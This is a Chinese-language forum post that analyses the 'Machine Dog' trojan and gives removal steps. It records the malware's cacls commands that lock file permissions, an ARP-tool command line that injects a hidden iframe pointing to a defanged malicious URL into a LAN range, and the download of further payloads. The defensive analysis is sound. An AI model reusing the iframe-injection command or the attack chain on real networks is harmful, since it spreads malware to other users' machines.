返回列表 回復 發帖

徹底清除機器狗木馬的方法

徹底清除機器狗木馬的方法
器狗木馬有10多個變種!

%Temp%釋放隨機命名的P處理,建立pcihdd.sys資料夾  

本身並不判斷檔案系統,直接P處理,保證pcihdd.sys、userinit.exe不被NTFS檔案系統的許可權控制:  

Parent process:  
Path: C:WINNTsystem32CMD.EXE  
PID: 468  
Information: Windows NT Command Processor (Microsoft Corporation)  
Child process:  
Path: C:WINNTsystem32cacls.exe  
Information: Control ACLs Program (Microsoft Corporation)  
Command line:cacls C:winntsystem32driverspcihdd.sys /e /p everyone:n  

Parent process:  
Path: C:WINNTsystem32CMD.EXE  
PID: 468  
Information: Windows NT Command Processor (Microsoft Corporation)  
Child process:  
Path: C:WINNTsystem32cacls.exe  
Information: Control ACLs Program (Microsoft Corporation)  
Command line:cacls C:winntsystem32userinit.exe /e /p everyone:r  

然後釋放病毒檔pvc.exe,於192.168.0.1-192.168.0.254網段  

加入框架(病毒)資料包,參數為:  

-idx 0 -ip 192.168.0.1-192.168.0.254 -port 80 -insert "<iframe src=’hXXp://xxx.mmma.biz/js.htm’ width=0 height=0></iframe>"  

病毒行為:  

去除pcihdd.sys的檔案屬性,並刪除原有的pcihdd.sys資料夾。  

然後繼續下載:  
h**p://xx*.XXXXX.biz/big.exe  
h**p://xx*.XXXX.biz/big1.exe  

哈哈,自始至終終於見到機器狗了(big.exe)  

第2個是上面分析過的ARP病毒,哈哈``54ing``刪掉  

再看看那個機器狗,哈``首先檢測pcihdd.sys是否存在。  

若不在則註冊該驅動,然後判斷條件,如果滿足以下條件則退出,不做其他操作:  

1、不是開機磁碟分割,比如說雙系統。  

2、檔案系統,哈哈``不會是針對FAT16的吧  

3、如果是NTFS,使用了檔案壓縮功能,可能導致病毒驅動在計算Userinnt位址時會出現錯誤?  

4、讀取Userinnt失敗(設置許可權),這個版本的小狗應該還不至於出現這情況。  

如果沒有意外,則pcihdd.sys訪問磁片底層,讀取%SystemRoot%System32Userinit.exe  

並修改。(應該會穿過一些還原類的東東`)  

我測試被HIPS自動拒絕,所以。。。。>_<  

能不能穿透影子還不知道。  

被修改後的Userinit.exe,重啟系統後聯網下載東東:  

至於解決方法,基本有這幾條思路:  

1、殺軟或HIPS禁止其運行。(對個人PC比較實用)  

2、許可權設置,禁止修改Userinit.exe和創建pcihdd.sys。(看起來比較渺茫``HIPS的FD可以)  

3、路由或防火牆那裡把hXXp://xxx.mmma.biz遮罩了  

4、註冊表許可權,這個比較簡單,網吧或局域環境的,操作起來不會太難:  

我的是2K系統,比較麻煩```:  

開始-運行-regedt32(XP系統不用,直接運行regedit就可以!)  

在HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices (系統服務)  

建立個名為PciHdd的空鍵,然後上許可權,system和管理員許可權的都要設置。  

如果已經有了PciHdd,不用刪它,設置為禁止控制和讀取 ^_^  



5、最後一個比較推薦:  

CMD  

cd ……到drivers  

md pcihdd.sys  

cd pcihdd.sys  

md 1...
返回列表